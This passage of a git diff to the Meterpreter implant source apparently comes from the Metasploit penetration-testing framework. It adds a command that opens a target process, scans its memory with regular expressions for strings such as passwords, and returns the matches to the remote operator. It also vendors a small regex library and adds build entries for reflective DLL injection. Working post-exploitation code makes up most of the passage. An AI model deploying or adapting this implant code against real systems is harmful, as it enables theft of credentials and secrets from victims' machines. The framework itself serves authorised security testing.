</summary> +/// <param name="packet">The packet to insert the needle group into</param> +/// <returns>ERROR_SUCCESS on success, else non-zero</returns> +NTSTATUS add_needle_results_to_packet(Packet* packet, const unsigned char* memory_buffer_ptr, size_t match_length, size_t match_address, size_t memory_base_address, size_t memory_region_size) +{ + if (packet == NULL || memory_buffer_ptr == NULL) { return ERROR_INVALID_PARAMETER; } + + dprintf("[MEM SEARCH] Creating results group"); + Packet* search_results = met_api->packet.create_group(); + if (search_results == NULL) { dprintf("[MEM SEARCH] Could not create search result group"); return ERROR_OUTOFMEMORY; } + + dprintf("[MEM SEARCH] Adding results to packet group"); + // Note: This raw data needs to be read from the buffer we copied. Trying to read it from mem.BaseAddress directly will make us crash. + met_api->packet.add_tlv_raw(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_STR, (LPVOID)memory_buffer_ptr, (DWORD)match_length + 1); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR, match_address); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_START_ADDR, memory_base_address); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_SECT_LEN, memory_region_size); + met_api->packet.add_tlv_uint(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN, (UINT)match_length); + + met_api->packet.add_group(packet, TLV_TYPE_MEMORY_SEARCH_RESULTS, search_results); + + return ERROR_SUCCESS; +} + +static HMODULE hKernel32 = NULL; +static HMODULE hNTDLL = NULL; + +static GETPROCADDRESS fGetProcAddress = NULL; +static OPENPROCESS fOpenProcess = NULL; +static CLOSEHANDLE fCloseHandle = NULL; +static VIRTUALQUERYEX fVirtualQueryEx = NULL; +static NTREADVIRTUALMEMORY fNtReadVirtualMemory = NULL; + +NTSTATUS setup_handles() +{ + if ((hKernel32 = GetModuleHandleA("kernel32.dll")) == NULL) { dprintf("[MEM SEARCH] Could not get kernel32.dll handle"); return ERROR_INVALID_HANDLE; } + + if ((hNTDLL = GetModuleHandleA("ntdll.dll")) == NULL) { dprintf("[MEM SEARCH] Could not get ntdll.dll handle"); return ERROR_INVALID_HANDLE; } + + if ((fGetProcAddress = (GETPROCADDRESS)GetProcAddress(hKernel32, "GetProcAddress")) == NULL) { dprintf("[MEM SEARCH] Could not get GetProcAddress handle"); return ERROR_INVALID_ADDRESS; } + + if ((fVirtualQueryEx = (VIRTUALQUERYEX)fGetProcAddress(hKernel32, "VirtualQueryEx")) == NULL) { dprintf("[MEM SEARCH] Could not get VirtualQueryEx handle"); return ERROR_INVALID_ADDRESS; } + + if ((fOpenProcess = (OPENPROCESS)fGetProcAddress(hKernel32, "OpenProcess")) == NULL) { dprintf("[MEM SEARCH] Could not get OpenProcess handle"); return ERROR_INVALID_ADDRESS; } + + if ((fCloseHandle = (CLOSEHANDLE)fGetProcAddress(hKernel32, "CloseHandle")) == NULL) { dprintf("[MEM SEARCH] Could not get CloseHandle handle"); return ERROR_INVALID_ADDRESS; } + + if ((fNtReadVirtualMemory = (NTREADVIRTUALMEMORY)fGetProcAddress(hNTDLL, "NtReadVirtualMemory")) == NULL ) { dprintf("[MEM SEARCH] Could not get NtReadVirtualMemory handle"); return ERROR_INVALID_ADDRESS; } + + return ERROR_SUCCESS; +} + +/* + * Read through all of a process's virtual memory in the search for regular expression needles. + * + * req: TLV_TYPE_PID - The target process ID. + * req: TLV_TYPE_MEMORY_SEARCH_NEEDLE - The regular expression needle to search for. + * req: TLV_TYPE_UINT - The minimum length of a match. + * req: TLV_TYPE_MEMORY_SEARCH_MATCH_LEN - The maximum length of a match. + */ +DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) +{ + Packet* response = met_api->packet.create_response(packet); + DWORD result = ERROR_SUCCESS; + unsigned char* memory_buffer = NULL; + size_t needle_enum_index = 0; + HANDLE process_handle = NULL; + RegexNeedle regex_needles[NEEDLES_MAX] = { NULL }; + + dprintf("[MEM SEARCH] Getting PID"); + const DWORD pid = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_PID); + if (pid == 0) { result = ERROR_INVALID_PARAMETER; goto done; } + dprintf("[MEM SEARCH] Searching PID: %lu", pid); + + Tlv needle_tlv = { 0 }; + while (needle_enum_index < NEEDLES_MAX && met_api->packet.enum_tlv(packet, (DWORD)needle_enum_index, TLV_TYPE_MEMORY_SEARCH_NEEDLE, &needle_tlv) == ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Compiling needle regex from TLV"); + const int result = re_compile(needle_tlv.buffer, needle_tlv.header.length - 1, (re_t)®ex_needles[needle_enum_index].compiled_regex, (unsigned char*)®ex_needles[needle_enum_index].buffer); + if (result != ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Failed to setup compile needle regex from TLV packet"); + goto done; + } + + needle_enum_index++; + } + + dprintf("[MEM SEARCH] Getting Match Lengths"); + const size_t min_match_length = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_UINT); + const size_t max_match_length = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN); + if (min_match_length > max_match_length || max_match_length == 0) { dprintf("[MEM SEARCH] Incorrect min or max match lengths"); result = ERROR_INVALID_PARAMETER; goto done; } + const size_t current_max_match_length = max_match_length; + + dprintf("[MEM SEARCH] Getting handles & proc addresses"); + if ((result = setup_handles()) != ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Could not set up all necessary handles & proc addresses"); + goto done; + } + + const DWORD process_vm_read = 0x0010; + const DWORD process_query_information = 0x0400; + const DWORD wanted_process_perms = process_vm_read | process_query_information; + + dprintf("[MEM SEARCH] Opening process"); + process_handle = fOpenProcess(wanted_process_perms, FALSE, pid); + if (process_handle == NULL) { dprintf("[MEM SEARCH] Could not get process handle"); result = ERROR_INVALID_HANDLE; goto done; } + + MEMORY_BASIC_INFORMATION mem = { 0 }; + dprintf("[MEM SEARCH] Allocating buffer for storing process memory"); + memory_buffer = (unsigned char*)malloc(MEMORY_BUFFER_SIZE * sizeof(unsigned char)); + if (memory_buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory buffer"); result = ERROR_OUTOFMEMORY; goto done; } + + for (size_t current_ptr = 0; fVirtualQueryEx(process_handle, (LPCVOID)current_ptr, &mem, sizeof(mem)); current_ptr += mem.RegionSize) + { + if (!can_read_memory(mem.Protect)) { continue; } + + size_t memory_region_offset = 0; + // Note: This currently does not support regex'ing over multiple memory regions. + // e.g. + // regex = "my_password.*"; + // | ....my_pas | sword.... | + while (mem.RegionSize > memory_region_offset) + { + const size_t leftover_bytes = mem.RegionSize - memory_region_offset; + const size_t bytes_to_read = min(leftover_bytes, MEMORY_BUFFER_SIZE * sizeof(unsigned char)); + dprintf("[MEM SEARCH] Leftover Bytes count: %llu", leftover_bytes); + dprintf("[MEM SEARCH] Bytes to read: %llu", bytes_to_read); + size_t bytes_read = 0; + + const size_t read_address = (size_t)mem.BaseAddress + memory_region_offset; + // Note: This will read up to a maximum of bytes_to_read OR to the end of the memory region if the end of it has been reached. + if (fNtReadVirtualMemory(process_handle, (LPCVOID)read_address, memory_buffer, bytes_to_read, &bytes_read) != ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Failed to read some virtual memory for process, skipping %u bytes", bytes_to_read); + memory_region_offset += bytes_to_read; + continue; + } + + dprintf("[MEM SEARCH] Read %llu bytes", bytes_read); + // Note: Increment the offset so that we aren't stuck in an infinite loop, trying to read zero bytes from the same pointer. + if (bytes_read == 0) { dprintf("[MEM SEARCH] Read zero bytes from a readable memory region"); memory_region_offset += bytes_to_read; continue; } + + for (size_t current_needle_index = 0; current_needle_index < needle_enum_index; current_needle_index++) + { + size_t current_buffer_offset = 0; + size_t match_length = 0; + int match_result = -1; + + do + { + const unsigned char* current_buffer_ptr = memory_buffer + current_buffer_offset; + const size_t bytes_to_regex = bytes_read - current_buffer_offset; + + match_result = re_matchp((re_t)®ex_needles[current_needle_index].compiled_regex, current_buffer_ptr, bytes_to_regex, current_max_match_length, &match_length); + + if (match_result != -1) + { + const size_t match_address = read_address + current_buffer_offset + match_result; + dprintf("[MEM SEARCH] -- ! FOUND A REGEX MATCH ! --"); + dprintf("[MEM SEARCH] Address: %p", match_address); + + if (match_length < min_match_length) + { + dprintf("[MEM SEARCH] Match length was too short, skipping."); + current_buffer_offset += (match_result + match_length); + continue; + } + + const unsigned char* memory_buffer_ptr = memory_buffer + current_buffer_offset + match_result; + if (add_needle_results_to_packet(response, memory_buffer_ptr, match_length, match_address, (size_t)mem.BaseAddress, mem.RegionSize) != ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Adding search results to packet was not successful"); + } + + current_buffer_offset += (match_result + match_length); + } + } while (match_result != -1); + } + + memory_region_offset += bytes_to_read; + } + } + + result = ERROR_SUCCESS; + +done: + dprintf("[MEM SEARCH] Memory Search complete."); + if (memory_buffer != NULL) { dprintf("[MEM SEARCH] Freeing process memory buffer."); free(memory_buffer); } + if (process_handle != NULL) { dprintf("[MEM SEARCH] Closing process handle."); fCloseHandle(process_handle); } + + dprintf("[MEM SEARCH] Transmitting response"); + met_api->packet.transmit_response(result, remote, response); + return ERROR_SUCCESS; +} diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/process.h b/c/meterpreter/source/extensions/stdapi/server/sys/process/process.h index da04b4d23..85ca089cf 100644 --- a/c/meterpreter/source/extensions/stdapi/server/sys/process/process.h +++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/process.h @@ -46,6 +46,7 @@ DWORD request_sys_process_memory_query(Remote *remote, Packet *packet); DWORD request_sys_process_memory_protect(Remote *remote, Packet *packet); DWORD request_sys_process_memory_lock(Remote *remote, Packet *packet); DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet); +DWORD request_sys_process_memory_search(Remote *remote, Packet *packet); // Thread DWORD request_sys_process_thread_open(Remote *remote, Packet *packet); diff --git a/c/meterpreter/source/extensions/stdapi/stdapi.h b/c/meterpreter/source/extensions/stdapi/stdapi.h old mode 100755 new mode 100644 index 7ee5303a3..adc2b5b52 --- a/c/meterpreter/source/extensions/stdapi/stdapi.h +++ b/c/meterpreter/source/extensions/stdapi/stdapi.h @@ -98,6 +98,15 @@ #define TLV_TYPE_REGISTER_VALUE_32 MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 2542 ) #define TLV_TYPE_REGISTER MAKE_CUSTOM_TLV( TLV_META_TYPE_GROUP, TLV_TYPE_EXTENSION_STDAPI, 2550 ) +// Memory - Taken from Mettle: https://github.com/rapid7/mettle/blob/master/mettle/src/tlv_types.h#L262 +#define TLV_TYPE_MEMORY_SEARCH_NEEDLE MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 2650 ) +#define TLV_TYPE_MEMORY_SEARCH_RESULTS MAKE_CUSTOM_TLV( TLV_META_TYPE_GROUP, TLV_TYPE_EXTENSION_STDAPI, 2651 ) +#define TLV_TYPE_MEMORY_SEARCH_MATCH_LEN MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 2652 ) +#define TLV_TYPE_MEMORY_SEARCH_START_ADDR MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2653 ) +#define TLV_TYPE_MEMORY_SEARCH_SECT_LEN MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2654 ) +#define TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2655 ) +#define TLV_TYPE_MEMORY_SEARCH_MATCH_STR MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 2656 ) + // Registry #define TLV_TYPE_HKEY MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 1000 ) #define TLV_TYPE_ROOT_KEY TLV_TYPE_HKEY diff --git a/c/meterpreter/source/extensions/winpmem/winpmem.cpp b/c/meterpreter/source/extensions/winpmem/winpmem.cpp old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/winpmem/winpmem.h b/c/meterpreter/source/extensions/winpmem/winpmem.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/metsrv/metsrv.h b/c/meterpreter/source/metsrv/metsrv.h index e73aaacd8..7013b66d5 100644 --- a/c/meterpreter/source/metsrv/metsrv.h +++ b/c/meterpreter/source/metsrv/metsrv.h @@ -18,6 +18,10 @@ #include "remote_dispatch.h" #include "libloader.h" +#define EXITFUNC_SEH 0xEA320EFE +#define EXITFUNC_THREAD 0x0A2A1DE0 +#define EXITFUNC_PROCESS 0x56A2B5F0 + #include "../ReflectiveDLLInjection/inject/src/GetProcAddressR.h" #include "../ReflectiveDLLInjection/inject/src/LoadLibraryR.h" #include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.h" diff --git a/c/meterpreter/source/metsrv/server_pivot_named_pipe.c b/c/meterpreter/source/metsrv/server_pivot_named_pipe.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/tiny-regex-c/README.md b/c/meterpreter/source/tiny-regex-c/README.md new file mode 100644 index 000000000..a32fdb14e --- /dev/null +++ b/c/meterpreter/source/tiny-regex-c/README.md @@ -0,0 +1,3 @@ +# tiny-regex-c + +This library is taken from https://github.com/kokke/tiny-regex-c/tree/2d306a5a71128853d18292e8bb85c8e745fbc9d0 - with changes to support null-bytes. diff --git a/c/meterpreter/source/tiny-regex-c/re.c b/c/meterpreter/source/tiny-regex-c/re.c new file mode 100644 index 000000000..98eaf66cd --- /dev/null +++ b/c/meterpreter/source/tiny-regex-c/re.c @@ -0,0 +1,488 @@ +/* + * + * Mini regex-module inspired by Rob Pike's regex code described in: + * + * http://www.cs.princeton.edu/courses/archive/spr09/cos333/beautiful.html + * + * + * + * Supports: + * --------- + * '.' Dot, matches any character + * '^' Start anchor, matches beginning of string + * '$' End anchor, matches end of string + * '*' Asterisk, match zero or more (greedy) + * '+' Plus, match one or more (greedy) + * '?' Question, match zero or one (non-greedy) + * '[abc]' Character class, match if one of {'a', 'b', 'c'} + * '[^abc]' Inverted class, match if NOT one of {'a', 'b', 'c'} -- NOTE: feature is currently broken! + * '[a-zA-Z]' Character ranges, the character set of the ranges { a-z | A-Z } + * '\s' Whitespace, \t \f \r \n \v and spaces + * '\S' Non-whitespace + * '\w' Alphanumeric, [a-zA-Z0-9_] + * '\W' Non-alphanumeric + * '\d' Digits, [0-9] + * '\D' Non-digits + * + * + */ + + +#include "re.h" +#include <stdio.h> +#include <ctype.h> + +/* Definitions: */ + +enum { UNUSED, DOT, BEGIN, END, QUESTIONMARK, STAR, PLUS, CHAR_RE, CHAR_CLASS, INV_CHAR_CLASS, DIGIT, NOT_DIGIT, ALPHA, NOT_ALPHA, WHITESPACE, NOT_WHITESPACE, /* BRANCH */ }; + +/* Private function declarations: */ +static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_size, size_t* matchlength); +static int matchcharclass(char c, const char* str); +static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_size, size_t* matchlength); +static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_size, size_t* matchlength); +static int matchone(regex_t p, char c); +static int matchdigit(char c); +static int matchalpha(char c); +static int matchwhitespace(char c); +static int matchmetachar(char c, const char* str); +static int matchrange(char c, const char* str); +static int matchdot(char c); +static int ismetachar(char c); + +/* Public functions: */ +int re_matchp(re_t pattern, const char* text, size_t text_length, size_t max_match_length, size_t* matchlength) +{ + if (max_match_length == 0) { return -1; } + *matchlength = 0; + + if (pattern == 0 || text_length == 0) { return -1; } + + if (pattern[0].type == BEGIN) + { + return ((matchpattern(&pattern[1], text, text_length, 0, max_match_length, matchlength)) ? 0 : -1); + } + + int idx = -1; + + do + { + idx += 1; + + if (matchpattern(pattern, text, text_length, idx, max_match_length, matchlength)) + { + return idx; + } + } + while ((size_t)idx < text_length); + + return -1; +} + +int re_compile(const char* pattern, size_t pattern_length, re_t compiled_regex, unsigned char* regex_char_buffer) +{ + int ccl_bufidx = 1; + + char c; /* current char in pattern */ + int i = 0; /* index into pattern */ + int j = 0; /* index into re_compiled */ + + while (i < (int)pattern_length && (j + 1 < MAX_REGEXP_OBJECTS)) + { + c = pattern[i]; + + switch (c) + { + /* Meta-characters: */ + case '^': { compiled_regex[j].type = BEGIN; } break; + case '$': { compiled_regex[j].type = END; } break; + case '.': { compiled_regex[j].type = DOT; } break; + case '*': { compiled_regex[j].type = STAR; } break; + case '+': { compiled_regex[j].type = PLUS; } break; + case '?': { compiled_regex[j].type = QUESTIONMARK; } break; + /* case '|': { compiled_regex[j].type = BRANCH; } break; <-- not working properly */ + + /* Escaped character-classes (\s \w ...): */ + case '\\': + { + if (i + 1 < (int)pattern_length) + { + /* Skip the escape-char '\\' */ + i += 1; + /* ... and check the next */ + switch (pattern[i]) + { + /* Meta-character: */ + case 'd': { compiled_regex[j].type = DIGIT; } break; + case 'D': { compiled_regex[j].type = NOT_DIGIT; } break; + case 'w': { compiled_regex[j].type = ALPHA; } break; + case 'W': { compiled_regex[j].type = NOT_ALPHA; } break; + case 's': { compiled_regex[j].type = WHITESPACE; } break; + case 'S': { compiled_regex[j].type = NOT_WHITESPACE; } break; + + /* Escaped character, e.g. '.' or '$' */ + default: + { + compiled_regex[j].type = CHAR_RE; + compiled_regex[j].u.ch = pattern[i]; + } break; + } + } + else + { + compiled_regex[j].type = CHAR_RE; + compiled_regex[j].u.ch = pattern[i]; + } + } break; + + /* Character class: */ + case '[': + { + /* Remember where the char-buffer starts. */ + int buf_begin = ccl_bufidx; + + /* Look-ahead to determine if negated */ + if (pattern[i + 1] == '^') + { + compiled_regex[j].type = INV_CHAR_CLASS; + i += 1; /* Increment i to avoid including '^' in the char-buffer */ + if (i + 1 == (int)pattern_length) /* incomplete pattern, missing non-zero char after '^' */ + { + return 1; + } + } + else + { + compiled_regex[j].type = CHAR_CLASS; + } + + /* Copy characters inside [..] to buffer */ + while ((pattern[++i] != ']') + && (i < (int)pattern_length)) /* Missing ] */ + { + if (pattern[i] == '\\') + { + if (ccl_bufidx >= MAX_CHAR_CLASS_LEN - 1) + { + //fputs("exceeded internal buffer!\n", stderr); + return 1; + } + if (i + 1 == (int)pattern_length) /* incomplete pattern, missing non-zero char after '\\' */ + { + return 1; + } + regex_char_buffer[ccl_bufidx++] = pattern[i++]; + } + else if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) + { + //fputs("exceeded internal buffer!\n", stderr); + return 1; + } + regex_char_buffer[ccl_bufidx++] = pattern[i]; + } + if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) + { + /* Catches cases such as [00000000000000000000000000000000000000][ */ + //fputs("exceeded internal buffer!\n", stderr); + return 1; + } + /* Null-terminate string end */ + regex_char_buffer[ccl_bufidx++] = 0; + compiled_regex[j].u.ccl = ®ex_char_buffer[buf_begin]; + } break; + + /* Other characters: */ + default: + { + compiled_regex[j].type = CHAR_RE; + compiled_regex[j].u.ch = c; + } break; + } + + i += 1; + j += 1; + } + /* 'UNUSED' is a sentinel used to indicate end-of-pattern */ + compiled_regex[j].type = UNUSED; + + return 0; // ERROR_SUCCESS +} + +void re_print(regex_t* pattern) +{ + const char* types[] = { "UNUSED", "DOT", "BEGIN", "END", "QUESTIONMARK", "STAR", "PLUS", "CHAR", "CHAR_CLASS", "INV_CHAR_CLASS", "DIGIT", "NOT_DIGIT", "ALPHA", "NOT_ALPHA", "WHITESPACE", "NOT_WHITESPACE", "BRANCH" }; + + int i; + int j; + char c; + for (i = 0; i < MAX_REGEXP_OBJECTS; ++i) + { + if (pattern[i].type == UNUSED) + { + break; + } + + printf("type: %s", types[pattern[i].type]); + if (pattern[i].type == CHAR_CLASS || pattern[i].type == INV_CHAR_CLASS) + { + printf(" ["); + for (j = 0; j < MAX_CHAR_CLASS_LEN; ++j) + { + c = pattern[i].u.ccl[j]; + if ((c == '\0') || (c == ']')) + { + break; + } + printf("%c", c); + } + printf("]"); + } + else if (pattern[i].type == CHAR_RE) + { + printf(" '%c'", pattern[i].u.ch); + } + printf("\n"); + } +} + + + +/* Private functions: */ +static int matchdigit(char c) +{ + return isdigit(c); +} +static int matchalpha(char c) +{ + return isalpha(c); +} +static int matchwhitespace(char c) +{ + return isspace(c); +} +static int matchalphanum(char c) +{ + return ((c == '_') || matchalpha(c) || matchdigit(c)); +} +static int matchrange(char c, const char* str) +{ + return ( (c != '-') + && (str[0] != '\0') + && (str[0] != '-') + && (str[1] == '-') + && (str[2] != '\0') + && ( (c >= str[0]) + && (c <= str[2]))); +} +static int matchdot(char c) +{ +#if defined(RE_DOT_MATCHES_NEWLINE) && (RE_DOT_MATCHES_NEWLINE == 1) + (void)c; + return 1; +#else + return c != '\n' && c != '\r'; +#endif +} +static int ismetachar(char c) +{ + return ((c == 's') || (c == 'S') || (c == 'w') || (c == 'W') || (c == 'd') || (c == 'D')); +} + +static int matchmetachar(char c, const char* str) +{ + switch (str[0]) + { + case 'd': return matchdigit(c); + case 'D': return !matchdigit(c); + case 'w': return matchalphanum(c); + case 'W': return !matchalphanum(c); + case 's': return matchwhitespace(c); + case 'S': return !matchwhitespace(c); + default: return (c == str[0]); + } +} + +static int matchcharclass(char c, const char* str) +{ + do + { + if (matchrange(c, str)) + { + return 1; + } + else if (str[0] == '\\') + { + /* Escape-char: increment str-ptr and match on next char */ + str += 1; + if (matchmetachar(c, str)) + { + return 1; + } + else if ((c == str[0]) && !ismetachar(c)) + { + return 1; + } + } + else if (c == str[0]) + { + if (c == '-') + { + return ((str[-1] == '\0') || (str[1] == '\0')); + } + else + { + return 1; + } + } + } + while (*str++ != '\0'); + + return 0; +} + +static int matchone(regex_t p, char c) +{ + switch (p.type) + { + case DOT: return matchdot(c); + case CHAR_CLASS: return matchcharclass(c, (const char*)p.u.ccl); + case INV_CHAR_CLASS: return !matchcharclass(c, (const char*)p.u.ccl); + case DIGIT: return matchdigit(c); + case NOT_DIGIT: return !matchdigit(c); + case ALPHA: return matchalphanum(c); + case NOT_ALPHA: return !matchalphanum(c); + case WHITESPACE: return matchwhitespace(c); + case NOT_WHITESPACE: return !matchwhitespace(c); + default: return (p.u.ch == c); + } +} + +static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength) +{ + size_t prelen = *matchlength; + const char* prepoint = text; + while ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(p, text[text_offset])) + { + text_offset++; + (*matchlength)++; + } + while (&text[text_offset] >= prepoint) + { + if (matchpattern(pattern, text, text_length, text_offset--, max_match_length, matchlength)) + return 1; + (*matchlength)--; + } + + *matchlength = prelen; + return 0; +} + +static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength) +{ + const char* prepoint = text; + while ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(p, text[text_offset])) + { + text_offset++; + (*matchlength)++; + } + while (text > prepoint) + { + if (matchpattern(pattern, text, text_length, text_offset--, max_match_length, matchlength)) + return 1; + (*matchlength)--; + } + + return 0; +} + +static int matchquestion(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength) +{ + if (p.type == UNUSED) + return 1; + if (matchpattern(pattern, text, text_length, text_offset, max_match_length, matchlength)) + return 1; + if ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(p, text[text_offset++])) + { + if (matchpattern(pattern, text, text_length, text_offset, max_match_length, matchlength)) + { + (*matchlength)++; + return 1; + } + } + return 0; +} + + +#if 0 + +/* Recursive matching */ +static int matchpattern(regex_t* pattern, const char* text, int *matchlength) +{ + int pre = *matchlength; + if ((pattern[0].type == UNUSED) || (pattern[1].type == QUESTIONMARK)) + { + return matchquestion(pattern[1], &pattern[2], text, matchlength); + } + else if (pattern[1].type == STAR) + { + return matchstar(pattern[0], &pattern[2], text, matchlength); + } + else if (pattern[1].type == PLUS) + { + return matchplus(pattern[0], &pattern[2], text, matchlength); + } + else if ((pattern[0].type == END) && pattern[1].type == UNUSED) + { + return text[0] == '\0'; + } + else if ((text[0] != '\0') && matchone(pattern[0], text[0])) + { + (*matchlength)++; + return matchpattern(&pattern[1], text+1); + } + else + { + *matchlength = pre; + return 0; + } +} + +#else + +/* Iterative matching */ +static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength) +{ + size_t pre = *matchlength; + do + { + if ((pattern[0].type == UNUSED) || (pattern[1].type == QUESTIONMARK)) + { + return matchquestion(pattern[0], &pattern[2], text, text_length, text_offset, max_match_length, matchlength); + } + else if (pattern[1].type == STAR) + { + return matchstar(pattern[0], &pattern[2], text, text_length, text_offset, max_match_length, matchlength); + } + else if (pattern[1].type == PLUS) + { + return matchplus(pattern[0], &pattern[2], text, text_length, text_offset, max_match_length, matchlength); + } + else if ((pattern[0].type == END) && pattern[1].type == UNUSED) + { + return (text_offset == text_length - 1); + } +/* Branching is not working properly + else if (pattern[1].type == BRANCH) + { + return (matchpattern(pattern, text) || matchpattern(&pattern[2], text)); + } +*/ + (*matchlength)++; + } + while ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(*pattern++, text[text_offset++])); + + *matchlength = pre; + return 0; +} + +#endif diff --git a/c/meterpreter/source/tiny-regex-c/re.h b/c/meterpreter/source/tiny-regex-c/re.h new file mode 100644 index 000000000..1419df34a --- /dev/null +++ b/c/meterpreter/source/tiny-regex-c/re.h @@ -0,0 +1,71 @@ +/* + * + * Mini regex-module inspired by Rob Pike's regex code described in: + * + * http://www.cs.princeton.edu/courses/archive/spr09/cos333/beautiful.html + * + * + * + * Supports: + * --------- + * '.' Dot, matches any character + * '^' Start anchor, matches beginning of string + * '$' End anchor, matches end of string + * '*' Asterisk, match zero or more (greedy) + * '+' Plus, match one or more (greedy) + * '?' Question, match zero or one (non-greedy) + * '[abc]' Character class, match if one of {'a', 'b', 'c'} + * '[^abc]' Inverted class, match if NOT one of {'a', 'b', 'c'} -- NOTE: feature is currently broken! + * '[a-zA-Z]' Character ranges, the character set of the ranges { a-z | A-Z } + * '\s' Whitespace, \t \f \r \n \v and spaces + * '\S' Non-whitespace + * '\w' Alphanumeric, [a-zA-Z0-9_] + * '\W' Non-alphanumeric + * '\d' Digits, [0-9] + * '\D' Non-digits + * + * + */ + +#ifndef _TINY_REGEX_C +#define _TINY_REGEX_C + +#ifndef RE_DOT_MATCHES_NEWLINE +/* Define to 0 if you DON'T want '.' to match '\r' + '\n' */ +#define RE_DOT_MATCHES_NEWLINE 1 +#endif + +#ifdef __cplusplus +extern "C"{ +#endif + +// size_t for 32-bit compilation. +#include <stddef.h> + +typedef struct regex_t +{ + unsigned char type; /* CHAR, STAR, etc. */ + union + { + unsigned char ch; /* the character itself */ + unsigned char* ccl; /* OR a pointer to characters in class */ + } u; +} regex_t; + +/* Typedef'd pointer to get abstract datatype. */ +typedef struct regex_t* re_t; + +#define MAX_REGEXP_OBJECTS 255 /* Max number of regex symbols in expression. */ +#define MAX_CHAR_CLASS_LEN 255 /* Max length of character-class buffer in. */ + +/* Find matches of the compiled pattern inside text. */ +int re_matchp(re_t pattern, const char* text, size_t text_length, size_t max_match_length, size_t* matchlength); + +/* Compile a regular expression in-place, allowing for multiple needles to be compiled without the usage of a static buffer. Returns ERROR_SUCCESS (0) on success, else 1. */ +int re_compile(const char* pattern, size_t pattern_length, re_t compiled_regex, unsigned char* regex_char_buffer); + +#ifdef __cplusplus +} +#endif + +#endif /* ifndef _TINY_REGEX_C */ diff --git a/c/meterpreter/workspace/CMakeLists.txt b/c/meterpreter/workspace/CMakeLists.txt index cdf3207a6..21b9b1d16 100644 --- a/c/meterpreter/workspace/CMakeLists.txt +++ b/c/meterpreter/workspace/CMakeLists.txt @@ -225,6 +225,8 @@ if(BUILD_METSRV) set(MET_SERVERS metsrv) endif() +set(MET_RDI_ASM ReflectiveDLLInjection) + set( MET_DLLS ${MET_SERVERS} @@ -234,6 +236,7 @@ set( set( MET_PROJECTS + ${MET_RDI_ASM} ${MET_LIBS} ${MET_DLLS} ) diff --git a/c/meterpreter/workspace/ReflectiveDLLInjection/CMakeLists.txt b/c/meterpreter/workspace/ReflectiveDLLInjection/CMakeLists.txt new file mode 100644 index 000000000..f94f03797 --- /dev/null +++ b/c/meterpreter/workspace/ReflectiveDLLInjection/CMakeLists.txt @@ -0,0 +1,19 @@ +cmake_minimum_required(VERSION 3.15.7 FATAL_ERROR) + +set(PROJECT_NAME ReflectiveDLLInjection) + +project(${PROJECT_NAME} ASM) + +set(SRC_DIR ../../source/ReflectiveDLLInjection/dll/src) +if("${CMAKE_SYSTEM_PROCESSOR}" MATCHES "(x86_64|amd64)") + set(SRC_FILES ${SRC_DIR}/GateTrampoline64.s) +elseif("${CMAKE_SYSTEM_PROCESSOR}" MATCHES "(i386|i686)") + set(SRC_FILES ${SRC_DIR}/GateTrampoline32.s) +endif() + +set_property(DIRECTORY PROPERTY COMPILE_DEFINITIONS) +set_property(DIRECTORY PROPERTY INCLUDE_DIRECTORIES) +set(CMAKE_ASM_FLAGS_RELEASE_INIT "") +set(CMAKE_ASM_FLAGS_RELEASE "") + +add_library(${PROJECT_NAME} ${SRC_FILES}) diff --git a/c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj 